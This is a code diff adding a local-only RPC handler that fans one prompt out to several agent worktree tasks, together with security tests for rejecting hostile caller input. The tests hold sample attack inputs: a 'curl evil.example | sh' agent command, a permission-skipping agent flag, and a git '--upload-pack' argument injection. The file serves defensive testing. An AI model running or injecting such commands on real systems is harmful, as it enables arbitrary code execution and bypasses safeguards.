+describe('task.fanout.start — happy path (so the rejections below mean something)', () => {
+  it('accepts, runs detached, and reports the server-chosen repo + workspace', async () => {
+    const h = setup();
+    const res = await h.call(goodParams());
+    expect(res).toMatchObject({
+      ok: true,
+      status: 'accepted',
+      taskCount: 2,
+      repoPath: CALLER_REPO_ROOT,
+      workspaceId: CALLER_WS,
+    });
+    expect(h.start).toHaveBeenCalledTimes(1);
+  });
+
+  it('pairs each title with its own prompt by index', async () => {
+    const h = setup();
+    await h.call(goodParams({ titles: ['a', 'b'], taskPrompts: ['pa', 'pb'] }));
+    expect(h.request().titles).toEqual(['a', 'b']);
+    expect(h.request().taskPrompts).toEqual(['pa', 'pb']);
+  });
+});
+
+// ── R1 ────────────────────────────────────────────────────────────────────
+// The agent command is interpolated verbatim into `${agentCmd} "$(cat …)"` and
+// written to a PTY. A wire caller that could set it would have arbitrary
+// command execution, so the field is not read at all.
+describe('R1 — agentCmd is never read from the wire', () => {
+  it('ignores a caller-supplied agentCmd and uses the fixed one', async () => {
+    const h = setup();
+    await h.call(goodParams({ agentCmd: 'curl evil.example | sh' }));
+    expect(h.request().agentCmd).toBe(FANOUT_WIRE_AGENT_CMD);
+    expect(h.request().agentCmd).not.toContain('curl');
+  });
+
+  it('ignores it even when it merely looks like a plausible agent', async () => {
+    const h = setup();
+    await h.call(goodParams({ agentCmd: 'claude --dangerously-skip-permissions' }));
+    expect(h.request().agentCmd).toBe(FANOUT_WIRE_AGENT_CMD);
+  });
+});
+
+// ── R2 ────────────────────────────────────────────────────────────────────
+// verifiedWorkspaceId drives task ownership and channel authz. A caller that
+// could assert it would create tasks owned by someone else's workspace.
+describe('R2 — the caller workspace is derived, not asserted', () => {
+  it('ignores a caller-supplied verifiedWorkspaceId', async () => {
+    const h = setup();
+    await h.call(goodParams({ verifiedWorkspaceId: 'ws-victim' }));
+    expect(h.request().verifiedWorkspaceId).toBe(CALLER_WS);
+  });
+
+  it('ignores a caller-supplied memberId', async () => {
+    const h = setup();
+    await h.call(goodParams({ memberId: 'local-ui' }));
+    expect(h.request().memberId).toBeUndefined();
+  });
+
+  it('refuses a caller whose ptyId resolves to nothing', async () => {
+    const h = setup({ ownerWorkspaceId: '' });
+    const err = errorOf(await h.call(goodParams()));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('refuses a caller that sends no senderPtyId at all', async () => {
+    const h = setup();
+    const params = goodParams();
+    delete params.senderPtyId;
+    const err = errorOf(await h.call(params));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('refuses the reserved human workspace', async () => {
+    const h = setup({ ownerWorkspaceId: HUMAN_WORKSPACE_ID });
+    const err = errorOf(await h.call(goodParams()));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(err.message).toContain(HUMAN_WORKSPACE_ID);
+    expect(h.start).not.toHaveBeenCalled();
+  });
+});
+
+// ── R3 ────────────────────────────────────────────────────────────────────
+// Unconstrained repoPath means `git worktree add` plus a new branch in any
+// repository on disk.
+describe('R3 — repoPath is confined to the caller\'s own repository', () => {
+  it('rejects a path in a different repository', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ repoPath: '/elsewhere/project' })));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(err.message).toContain(CALLER_REPO_ROOT);
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects a path that is not a git repository at all', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ repoPath: '/tmp/not-a-repo' })));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects a non-string repoPath', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ repoPath: { toString: 'nope' } })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects a flag-shaped path without handing it to git', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ repoPath: '--upload-pack=touch /tmp/pwned' })));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('accepts a subdirectory of the caller\'s own repo, but passes the ROOT on', async () => {
+    const h = setup();
+    const res = await h.call(goodParams({ repoPath: '/repo/packages/other' }));
+    expect(res.ok).toBe(true);
+    // The caller's string is never forwarded — the normalised toplevel is.
+    expect(h.request().repoPath).toBe(CALLER_REPO_ROOT);
+  });
+
+  it('uses the caller\'s repo root when repoPath is omitted entirely', async () => {
+    const h = setup();
+    await h.call(goodParams());
+    expect(h.request().repoPath).toBe(CALLER_REPO_ROOT);
+  });
+
+  it('refuses when the caller workspace has no working directory', async () => {
+    const h = setup({ cwd: null });
+    const err = errorOf(await h.call(goodParams()));
+    expect(err.code).toBe('FAILED_PRECONDITION');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('refuses when the caller workspace is not inside a git repository', async () => {
+    const h = setup({ cwd: '/tmp/scratch' });
+    const err = errorOf(await h.call(goodParams()));
+    expect(err.code).toBe('FAILED_PRECONDITION');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+});
+
+// ── R4 ────────────────────────────────────────────────────────────────────
+// Same lane as the a2a execute spawn: local only, everything else fails closed.
+describe('R4 — origin allowlist is fail-closed', () => {
+  it('rejects a remote-origin caller', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams(), { origin: 'remote' }));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects a caller with no context at all', async () => {
+    const h = setup();
+    const err = errorOf(await h.callWithoutCtx(goodParams()));
+    expect(err.code).toBe('NOT_AUTHORIZED');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects before doing ANY identity or repo resolution', async () => {
+    const h = setup();
+    await h.call(goodParams(), { origin: 'remote' });
+    expect(vi.mocked(sendToRenderer)).not.toHaveBeenCalled();
+    expect(vi.mocked(git)).not.toHaveBeenCalled();
+  });
+});
+
+// ── R5 ────────────────────────────────────────────────────────────────────
+// The GUI offers 1..8; the wire does not go through the GUI.
+describe('R5 — task count is capped server-side', () => {
+  it(`rejects more than ${FANOUT_MAX_TASKS} titles`, async () => {
+    const h = setup();
+    const titles = Array.from({ length: FANOUT_MAX_TASKS + 1 }, (_, k) => `task ${k}`);
+    const err = errorOf(await h.call(goodParams({ titles })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(err.message).toContain(String(FANOUT_MAX_TASKS));
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects a huge array on its raw length (before any per-element work)', async () => {
+    const h = setup();
+    const titles = Array.from({ length: 5000 }, () => '');
+    const err = errorOf(await h.call(goodParams({ titles })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it(`accepts exactly ${FANOUT_MAX_TASKS}`, async () => {
+    const h = setup();
+    const titles = Array.from({ length: FANOUT_MAX_TASKS }, (_, k) => `task ${k}`);
+    const res = await h.call(goodParams({ titles }));
+    expect(res).toMatchObject({ ok: true, taskCount: FANOUT_MAX_TASKS });
+  });
+
+  it('rejects an over-long taskPrompts array too', async () => {
+    const h = setup();
+    const taskPrompts = Array.from({ length: FANOUT_MAX_TASKS + 1 }, () => 'p');
+    const err = errorOf(await h.call(goodParams({ taskPrompts })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects zero usable titles', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ titles: ['   ', ''] })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects a non-array titles', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ titles: 'one, two' })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+});
+
+// ── R6 ────────────────────────────────────────────────────────────────────
+describe('R6 — prompt and title sizes are capped server-side', () => {
+  it('rejects an oversized shared prompt', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ prompt: 'x'.repeat(FANOUT_PROMPT_MAX_BYTES + 1) })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('rejects when shared + per-task together exceed the cap', async () => {
+    const h = setup();
+    const half = 'x'.repeat(FANOUT_PROMPT_MAX_BYTES - 10);
+    const err = errorOf(
+      await h.call(goodParams({ titles: ['a'], prompt: half, taskPrompts: ['y'.repeat(100)] })),
+    );
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('measures the cap in UTF-8 BYTES, not characters', async () => {
+    const h = setup();
+    // Each CJK char is 3 bytes, so this is under the char count but over bytes.
+    const prompt = '가'.repeat(Math.floor(FANOUT_PROMPT_MAX_BYTES / 3) + 1);
+    expect(prompt.length).toBeLessThan(FANOUT_PROMPT_MAX_BYTES);
+    const err = errorOf(await h.call(goodParams({ prompt })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+  });
+
+  it('rejects an over-long title', async () => {
+    const h = setup();
+    const err = errorOf(await h.call(goodParams({ titles: ['t'.repeat(CHANNEL_TOPIC_MAX + 1)] })));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+});
+
+// ── idempotency key / poll protocol ───────────────────────────────────────
+describe('idempotency key is required and doubles as the poll handle', () => {
+  it('rejects a missing key', async () => {
+    const h = setup();
+    const params = goodParams();
+    delete params.idempotencyKey;
+    const err = errorOf(await h.call(params));
+    expect(err.code).toBe('INVALID_ARGUMENT');
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('reports running for an in-flight key without starting a second run', async () => {
+    const h = setup({ status: { state: 'running' } });
+    const res = await h.call(goodParams());
+    expect(res).toMatchObject({ ok: true, status: 'running' });
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('returns the recorded result for a completed key without re-running', async () => {
+    const done: FanOutResult = { ok: true, tasks: [{ index: 0, title: 'a', ok: true, taskId: 'wtask-1' }] };
+    const h = setup({ status: { state: 'done', result: done } });
+    const res = await h.call(goodParams());
+    expect(res).toMatchObject({ ok: true, status: 'completed', result: done });
+    expect(h.start).not.toHaveBeenCalled();
+  });
+
+  it('answers a known key WITHOUT touching the renderer or git', async () => {
+    const h = setup({ status: { state: 'running' } });
+    await h.call(goodParams());
+    expect(vi.mocked(sendToRenderer)).not.toHaveBeenCalled();
+    expect(vi.mocked(git)).not.toHaveBeenCalled();
+  });
+});
+
+// ── one service, two front doors ──────────────────────────────────────────
+//
+// The idempotency LRU and the in-flight set are INSTANCE fields of
+// FanOutService. A second instance therefore means the same key is accepted
+// twice and the fan-out runs twice — duplicate worktrees, workspaces and
+// missions. That invariant lives in main/index.ts wiring, which no unit test
+// can exercise, so pin it at the source level instead.
+describe('FanOutService is constructed exactly once in main', () => {
+  // src/main/pipe/handlers/__tests__ -> src/main
+  const MAIN_DIR = nodePath.resolve(__dirname, '..', '..', '..');
+
+  function collectTsFiles(dir: string): string[] {
+    const out: string[] = [];
+    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
+      const full = nodePath.join(dir, entry.name);
+      if (entry.isDirectory()) {
+        if (entry.name === '__tests__' || entry.name === 'node_modules') continue;
+        out.push(...collectTsFiles(full));
+      } else if (entry.name.endsWith('.ts') && !entry.name.endsWith('.d.ts')) {
+        out.push(full);
+      }
+    }
+    return out;
+  }
+
+  it('has exactly one `new FanOutService(` in src/main, in the factory', () => {
+    const sites = collectTsFiles(MAIN_DIR).filter((f) =>
+      /\bnew FanOutService\s*\(/.test(fs.readFileSync(f, 'utf8')),
+    );
+    expect(sites.map((f) => nodePath.relative(MAIN_DIR, f))).toEqual([
+      nodePath.join('worktask', 'createFanOutService.ts'),
+    ]);
+  });
+
+  it('wires both front doors from one createFanOutService call', () => {
+    const src = fs.readFileSync(nodePath.join(MAIN_DIR, 'index.ts'), 'utf8');
+    const created = src.match(/createFanOutService\s*\(/g) ?? [];
+    expect(created).toHaveLength(1);
+    // Both registrars receive the SAME binding.
+    expect(src).toMatch(/const fanOutService = createFanOutService\(/);
+    expect(src).toMatch(/registerFanOutRpc\(rpcRouter, fanOutService,/);
+    expect(src).toMatch(/registerFanOutHandler\(fanOutService\)/);
+  });
+});

--- a/src/main/pipe/handlers/fanout.rpc.ts
+++ b/src/main/pipe/handlers/fanout.rpc.ts
@@ -1,0 +1,321 @@
+// ─── task.fanout.start — fan-out on the pipe / MCP surface ─────────────────
+//
+// J1 fan-out (one prompt → N isolated worktree tasks) was renderer-only: the
+// GUI modal invoked `fanout:start` over ipcMain and the pipe RpcRouter had no
+// registration, so an MCP client could not run one. This handler is that
+// registration — but it is NOT "the IPC handler with a router line". The IPC
+// path trusts every field because a human typed it into the modal; the wire
+// does not. So this handler builds a FanOutRequest from a STRICT SUBSET of
+// caller input plus server-derived values, and shares the IPC path's
+// FanOutService instance (idempotency is an instance property).
+//
+// Full rationale: plans/fanout-mcp-surface-design.md. The gates, in order:
+//
+//   R4 origin allowlist — `ctx.origin === 'local'` or reject. Verbatim from the
+//      a2a execute precedent (a2a.rpc.ts): fan-out spawns N processes and
+//      mutates a git repository, so remote/undefined/unknown fail closed.
+//   R2 identity — verifiedWorkspaceId is RESOLVED from senderPtyId via the
+//      renderer (the D5 anchor a2a.channel.* mutations use), never read from
+//      params. An unresolvable caller gets nothing.
+//   R3 repo confinement — the fan-out repo is the git toplevel of the CALLER's
+//      own workspace cwd. A caller-supplied repoPath is only allowed to
+//      re-state that same repository (compared as realpath'd toplevels).
+//   R1 agentCmd — never read from the wire. Interpolated verbatim into a shell
+//      line by FanOutService, so accepting it would be arbitrary command
+//      execution. Forced to FANOUT_WIRE_AGENT_CMD.
+//   R5/R6 caps — N ≤ FANOUT_MAX_TASKS, effective prompt ≤
+//      FANOUT_PROMPT_MAX_BYTES, title ≤ CHANNEL_TOPIC_MAX, checked here (not
+//      only inside the service) so the wire gets a wire-shaped rejection and
+//      an oversized array is bounded before any per-element work.
+//
+// Asynchrony is forced, not chosen: the MCP client's RPC deadline is 10s
+// (wmux-client.ts) and one task's renderer spawn alone is allowed 30s. So the
+// call is accept-then-poll — re-send the same idempotencyKey to get
+// running/completed. The poll answer is FanOutService's existing G1 LRU.
+
+import * as path from 'node:path';
+import * as fs from 'node:fs';
+import type { BrowserWindow } from 'electron';
+import type { RpcRouter } from '../RpcRouter';
+import type { RpcContext } from '../../../shared/rpc';
+import { HUMAN_WORKSPACE_ID, CHANNEL_TOPIC_MAX } from '../../../shared/channels';
+import { FANOUT_MAX_TASKS, FANOUT_PROMPT_MAX_BYTES } from '../../../shared/workTask';
+import { sendToRenderer } from './_bridge';
+import { git as runGit } from '../../git/git';
+import type { FanOutRequest, FanOutService } from '../../worktask/FanOutService';
+
+type GetWindow = () => BrowserWindow | null;
+
+/**
+ * R1 — the agent command wire callers get, always. NEVER read from params:
+ * FanOutService.buildInitialCommand interpolates this verbatim into
+ * `${agentCmd} "$(cat '<path>')"` and writes it to a PTY, so a caller-supplied
+ * value is arbitrary command execution. This matches the value the GUI modal
+ * pre-fills, so wire and GUI fan-outs launch the same agent.
+ */
+export const FANOUT_WIRE_AGENT_CMD = 'claude';
+
+/** Typed wire error, shaped like the a2a.channel.* / task.mission.* envelope so
+ *  MCP tools can branch on `error.code` instead of parsing a message. */
+function deny(code: string, message: string): { ok: false; error: { code: string; message: string } } {
+  return { ok: false, error: { code, message } };
+}
+
+/** Reject obviously hostile path input before it reaches `git` as a cwd.
+ *  Belt-and-braces: the path is passed as a child-process cwd, never as an
+ *  argv element, so this is not the load-bearing defence (R3's toplevel
+ *  comparison is) — it just keeps control characters and flag-looking strings
+ *  out of the process table and the logs. */
+function normalizeRepoInput(raw: string): string | null {
+  const trimmed = raw.trim();
+  if (trimmed.length === 0) return null;
+  if (trimmed.startsWith('-')) return null;
+  // eslint-disable-next-line no-control-regex
+  if (/[\x00-\x1f\x7f]/.test(trimmed)) return null;
+  return path.resolve(trimmed);
+}
+
+/**
+ * git toplevel of `dir`, realpath'd, or null. Realpath on BOTH sides of the R3
+ * comparison so a symlinked path cannot alias a different repository, and
+ * `--show-toplevel` so any subdirectory of the caller's repo normalises to the
+ * same answer (a prefix match would be defeated by `..` and by symlinks).
+ */
+async function repoRootOf(dir: string): Promise<string | null> {
+  const res = await runGit(['rev-parse', '--show-toplevel'], dir);
+  if (res.code !== 0) return null;
+  const top = res.stdout.trim();
+  if (top.length === 0) return null;
+  try {
+    return fs.realpathSync(top);
+  } catch {
+    return top;
+  }
+}
+
+/**
+ * R2 — resolve the caller's workspace from a verified senderPtyId. Identical
+ * anchor + resolution to a2a.channel.rpc.ts (the renderer answers which
+ * workspace owns that pty RIGHT NOW). '' when unresolvable.
+ */
+async function resolveCallerWorkspace(getWindow: GetWindow, params: Record<string, unknown>): Promise<string> {
+  const senderPtyId = typeof params['senderPtyId'] === 'string' ? params['senderPtyId'].trim() : '';
+  if (!senderPtyId) return '';
+  try {
+    const owner = await sendToRenderer(getWindow, 'input.findOwnerWorkspace', { ptyId: senderPtyId });
+    const wsId =
+      owner && typeof owner === 'object' && 'workspaceId' in owner
+        ? (owner as Record<string, unknown>)['workspaceId']
+        : null;
+    return typeof wsId === 'string' && wsId ? wsId : '';
+  } catch {
+    // Renderer unavailable (early boot / reload) — unresolvable, fail closed.
+    return '';
+  }
+}
+
+/** The caller workspace's cwd, from the same renderer projection the GUI modal
+ *  reads its default repo from (`workspace.list` → metadata.cwd). */
+async function resolveWorkspaceCwd(getWindow: GetWindow, workspaceId: string): Promise<string> {
+  let list: unknown;
+  try {
+    list = await sendToRenderer(getWindow, 'workspace.list');
+  } catch {
+    return '';
+  }
+  if (!Array.isArray(list)) return '';
+  for (const entry of list) {
+    if (!entry || typeof entry !== 'object') continue;
+    const e = entry as { id?: unknown; metadata?: { cwd?: unknown } };
+    if (e.id !== workspaceId) continue;
+    const cwd = e.metadata?.cwd;
+    return typeof cwd === 'string' ? cwd.trim() : '';
+  }
+  return '';
+}
+
+/** Parsed + capped task list. `titles[k]` pairs with `taskPrompts[k]`. */
+interface ParsedTasks {
+  titles: string[];
+  taskPrompts: string[];
+}
+
+/**
+ * R5/R6 — validate the task list against the SAME caps the GUI enforces.
+ * Pairing happens before filtering so a non-string title cannot shift a task's
+ * prompt onto its neighbour (the regression fanout.handler's normalizeRequest
+ * fixed on the IPC side).
+ */
+function parseTasks(params: Record<string, unknown>, sharedPrompt: string): ParsedTasks | { error: string } {
+  const rawTitles = params['titles'];
+  if (!Array.isArray(rawTitles)) return { error: 'titles must be an array of task titles' };
+  // Bound the RAW length before any per-element work — an oversized array is
+  // rejected on length, not after N trims.
+  if (rawTitles.length > FANOUT_MAX_TASKS) {
+    return { error: `task count ${rawTitles.length} exceeds the cap of ${FANOUT_MAX_TASKS}` };
+  }
+  const rawPrompts = Array.isArray(params['taskPrompts']) ? (params['taskPrompts'] as unknown[]) : [];
+  if (rawPrompts.length > FANOUT_MAX_TASKS) {
+    return { error: `taskPrompts length ${rawPrompts.length} exceeds the cap of ${FANOUT_MAX_TASKS}` };
+  }
+
+  const paired = rawTitles
+    .map((t, k) => ({
+      title: typeof t === 'string' ? t.trim() : '',
+      taskPrompt: typeof rawPrompts[k] === 'string' ? (rawPrompts[k] as string).trim() : '',
+    }))
+    .filter((e) => e.title.length > 0);
+
+  if (paired.length === 0) return { error: 'at least one non-empty task title is required' };
+  if (paired.length > FANOUT_MAX_TASKS) {
+    return { error: `task count ${paired.length} exceeds the cap of ${FANOUT_MAX_TASKS}` };
+  }
+
+  for (const [k, e] of paired.entries()) {
+    if (e.title.length > CHANNEL_TOPIC_MAX) {
+      return { error: `task ${k + 1} title exceeds ${CHANNEL_TOPIC_MAX} characters` };
+    }
+    // The EFFECTIVE prompt is what FanOutService will actually write to disk
+    // and interpolate: shared + per-task, empty side dropped.
+    const combined = [sharedPrompt, e.taskPrompt].filter((p) => p.length > 0).join('\n\n');
+    if (Buffer.byteLength(combined, 'utf8') > FANOUT_PROMPT_MAX_BYTES) {
+      return {
+        error: `task ${k + 1} prompt exceeds ${FANOUT_PROMPT_MAX_BYTES} bytes; shorten it and reference details from a file path`,
+      };
+    }
+  }
+
+  return {
+    titles: paired.map((e) => e.title),
+    taskPrompts: paired.map((e) => e.taskPrompt),
+  };
+}
+
+/**
+ * Register `task.fanout.start`. `service` MUST be the same instance the
+ * renderer IPC handler uses — see createFanOutService.ts.
+ */
+export function registerFanOutRpc(router: RpcRouter, service: FanOutService, getWindow: GetWindow): void {
+  router.register('task.fanout.start', async (params, ctx?: RpcContext) => {
+    // ── R4: origin allowlist, fail-closed ────────────────────────────────
+    // local + nothing else. `origin` is a REQUIRED RpcContext field, so a
+    // future remote transport cannot silently inherit fan-out by forgetting to
+    // classify itself. Same lane as the a2a execute spawn.
+    if (ctx?.origin !== 'local') {
+      return deny('NOT_AUTHORIZED', 'task.fanout.start is local-origin only (remote callers cannot spawn tasks)');
+    }
+
+    const idempotencyKey = typeof params['idempotencyKey'] === 'string' ? params['idempotencyKey'].trim() : '';
+    if (!idempotencyKey) {
+      return deny(
+        'INVALID_ARGUMENT',
+        'task.fanout.start requires an idempotencyKey — it is also the handle you poll this fan-out with',
+      );
+    }
+
+    // ── Poll branch ──────────────────────────────────────────────────────
+    // A repeat of a key we already know answers from the G1 bookkeeping and
+    // starts nothing. This is the whole poll protocol (see design §4).
+    const known = service.statusOf(idempotencyKey);
+    if (known.state === 'running') {
+      return { ok: true as const, status: 'running' as const, idempotencyKey };
+    }
+    if (known.state === 'done') {
+      return { ok: true as const, status: 'completed' as const, idempotencyKey, result: known.result };
+    }
+
+    // ── R2: caller identity, server-resolved ─────────────────────────────
+    const callerWorkspaceId = await resolveCallerWorkspace(getWindow, params);
+    if (!callerWorkspaceId) {
+      return deny(
+        'NOT_AUTHORIZED',
+        'task.fanout.start requires a verifiable caller (no resolvable senderPtyId)',
+      );
+    }
+    // Defence in depth: ws-human owns no panes, so no senderPtyId can resolve
+    // into it — but the reserved human workspace must never own agent-created
+    // tasks, and this stays symmetric with a2a.channel.rpc.ts's guards.
+    if (callerWorkspaceId === HUMAN_WORKSPACE_ID) {
+      return deny(
+        'NOT_AUTHORIZED',
+        `'${HUMAN_WORKSPACE_ID}' is the reserved human workspace and cannot fan out from the pipe`,
+      );
+    }
+
+    // ── R3: repo confinement ─────────────────────────────────────────────
+    const callerCwd = await resolveWorkspaceCwd(getWindow, callerWorkspaceId);
+    if (!callerCwd) {
+      return deny(
+        'FAILED_PRECONDITION',
+        `workspace ${callerWorkspaceId} has no working directory to fan out from`,
+      );
+    }
+    const callerCwdResolved = normalizeRepoInput(callerCwd);
+    if (!callerCwdResolved) {
+      return deny('FAILED_PRECONDITION', `workspace ${callerWorkspaceId} has an unusable working directory`);
+    }
+    const callerRepoRoot = await repoRootOf(callerCwdResolved);
+    if (!callerRepoRoot) {
+      return deny(
+        'FAILED_PRECONDITION',
+        `the calling workspace's directory is not inside a git repository: ${callerCwdResolved}`,
+      );
+    }
+    // A caller-supplied repoPath may only RE-STATE the caller's own repository.
+    // Anything else — another checkout, a parent directory, a sibling project —
+    // is refused; a wire caller must not be able to create worktrees and
+    // branches in a repository it does not already sit in.
+    if (params['repoPath'] !== undefined) {
+      if (typeof params['repoPath'] !== 'string') {
+        return deny('INVALID_ARGUMENT', 'repoPath must be a string when provided');
+      }
+      const requested = normalizeRepoInput(params['repoPath']);
+      const requestedRoot = requested ? await repoRootOf(requested) : null;
+      if (!requestedRoot || requestedRoot !== callerRepoRoot) {
+        return deny(
+          'NOT_AUTHORIZED',
+          `repoPath must resolve to the calling workspace's own repository (${callerRepoRoot})`,
+        );
+      }
+    }
+
+    // ── R5/R6: caps ──────────────────────────────────────────────────────
+    const sharedPrompt = typeof params['prompt'] === 'string' ? params['prompt'].trim() : '';
+    if (Buffer.byteLength(sharedPrompt, 'utf8') > FANOUT_PROMPT_MAX_BYTES) {
+      return deny('INVALID_ARGUMENT', `prompt exceeds ${FANOUT_PROMPT_MAX_BYTES} bytes`);
+    }
+    const parsed = parseTasks(params, sharedPrompt);
+    if ('error' in parsed) return deny('INVALID_ARGUMENT', parsed.error);
+
+    // ── Build the request from SERVER-DERIVED values only ────────────────
+    // Note what is absent: agentCmd (R1), verifiedWorkspaceId (R2), repoPath
+    // (R3), memberId. The request is constructed field by field — params is
+    // never spread — so a field added to the wire later cannot leak through by
+    // accident.
+    const req: FanOutRequest = {
+      idempotencyKey,
+      prompt: sharedPrompt,
+      titles: parsed.titles,
+      taskPrompts: parsed.taskPrompts,
+      repoPath: callerRepoRoot,
+      agentCmd: FANOUT_WIRE_AGENT_CMD,
+      verifiedWorkspaceId: callerWorkspaceId,
+    };
+
+    // Detached run (design §4): the caller polls with the same key. start()
+    // records a failed result rather than releasing the key on a throw, so a
+    // poll can never restart a fan-out that already spawned tasks.
+    void service.start(req).catch((err: unknown) => {
+      console.error(`[fanout.rpc] fan-out ${idempotencyKey} failed:`, err);
+    });
+
+    return {
+      ok: true as const,
+      status: 'accepted' as const,
+      idempotencyKey,
+      taskCount: parsed.titles.length,
+      repoPath: callerRepoRoot,
+      workspaceId: callerWorkspaceId,
+    };
+  });
+}

--- a/src/main/worktask/FanOutService.ts
+++ b/src/main/worktask/FanOutService.ts
@@ -118,6 +118,18 @@ export interface FanOutServiceOptions {
   worktrees?: TaskWorktreeManager;
 }
 
+/**
+ * Idempotency-key state, for the wire poll contract. The pipe surface cannot
+ * answer a fan-out synchronously (the MCP client's RPC deadline is 10s and a
+ * single task's spawn alone is allowed 30s), so it accepts the call, runs it
+ * detached, and lets the caller poll by re-sending the same key. This view
+ * turns the existing G1 idempotency bookkeeping into that poll answer.
+ */
+export type FanOutStatus =
+  | { state: 'unknown' }
+  | { state: 'running' }
+  | { state: 'done'; result: FanOutResult };
+
 export class FanOutService {
   private readonly daemon: FanOutDaemonPort;
   private readonly renderer: FanOutRendererPort;
@@ -156,9 +168,33 @@ export class FanOutService {
       // 완료 결과 저장(LRU cap).
       this.recordResult(key, result);
       return result;
+    } catch (err) {
+      // A THROWN run (as opposed to a per-task failure, which run() already
+      // folds into the result) must still terminate the key. The pipe surface
+      // polls by key: releasing the key here would let the next poll RESTART a
+      // fan-out that has already spawned tasks. Record the throw as a failed
+      // result instead, so the key answers "done, and it failed".
+      const failed: FanOutResult = {
+        ok: false,
+        error: `fanout:start threw: ${(err as Error).message}`,
+        tasks: [],
+      };
+      this.recordResult(key, failed);
+      return failed;
     } finally {
       this.inFlight.delete(key);
     }
+  }
+
+  /**
+   * Idempotency-key state for the wire poll contract (see FanOutStatus). Purely
+   * a read of the G1 bookkeeping — it starts nothing and mutates nothing.
+   */
+  statusOf(key: string): FanOutStatus {
+    const done = this.results.get(key);
+    if (done) return { state: 'done', result: done };
+    if (this.inFlight.has(key)) return { state: 'running' };
+    return { state: 'unknown' };
   }
 
   private async run(req: FanOutRequest): Promise<FanOutResult> {

--- a/src/main/worktask/__tests__/FanOutService.test.ts
+++ b/src/main/worktask/__tests__/FanOutService.test.ts
@@ -467,3 +467,70 @@ describe('프리플라이트 거부 — 태스크 생성 0', () => {
     expect(res.error).toMatch(/exceeds cap/);
   });
 });
+
+// ─── Wire poll contract (fan-out on the pipe surface) ──────────────────────
+//
+// The pipe front door cannot answer a fan-out synchronously — the MCP client's
+// RPC deadline is 10s and a single task's spawn alone is allowed 30s — so it
+// accepts, runs detached, and lets the caller poll by re-sending the same
+// idempotency key. Both properties below exist to make that poll safe.
+describe('statusOf — the idempotency key as a poll handle', () => {
+  it('an unknown key reports unknown (so a first call may start it)', () => {
+    const svc = new FanOutService({
+      daemon: makeDaemonFake().port,
+      renderer: makeRendererFake().port,
+      worktrees: makeWorktreesFake(),
+    });
+    expect(svc.statusOf('never-seen')).toEqual({ state: 'unknown' });
+  });
+
+  it('reports running while in flight, then done with the recorded result', async () => {
+    // Gate the renderer spawn so the run is observably mid-flight.
+    let release!: () => void;
+    const gate = new Promise<void>((r) => { release = r; });
+    const renderer: FanOutRendererPort = {
+      spawnWorkspace: async () => {
+        await gate;
+        return { workspaceId: 'ws-task-1', ptyId: 'pty-1' };
+      },
+    };
+    const svc = new FanOutService({
+      daemon: makeDaemonFake().port,
+      renderer,
+      worktrees: makeWorktreesFake(),
+    });
+
+    const inFlight = svc.start(baseReq({ titles: ['Only task'] }));
+    // Yield until the run reaches the gated spawn.
+    for (let i = 0; i < 20; i++) await Promise.resolve();
+    expect(svc.statusOf('fo-key-1')).toEqual({ state: 'running' });
+
+    release();
+    const result = await inFlight;
+    expect(svc.statusOf('fo-key-1')).toEqual({ state: 'done', result });
+  });
+
+  it('a THROWN run records a failed result instead of releasing the key', async () => {
+    // A released key would let the next poll RESTART a fan-out that had already
+    // spawned tasks — the one outcome the poll protocol must never produce.
+    const preflight = vi.fn(async () => {
+      throw new Error('disk exploded');
+    });
+    const svc = new FanOutService({
+      daemon: makeDaemonFake().port,
+      renderer: makeRendererFake().port,
+      worktrees: { preflight } as any,
+    });
+
+    const res = await svc.start(baseReq());
+    expect(res.ok).toBe(false);
+    expect(res.error).toMatch(/disk exploded/);
+    expect(svc.statusOf('fo-key-1')).toEqual({ state: 'done', result: res });
+
+    // A poll after the throw answers "done, failed" — it does not re-run.
+    expect(preflight).toHaveBeenCalledTimes(1);
+    const again = await svc.start(baseReq());
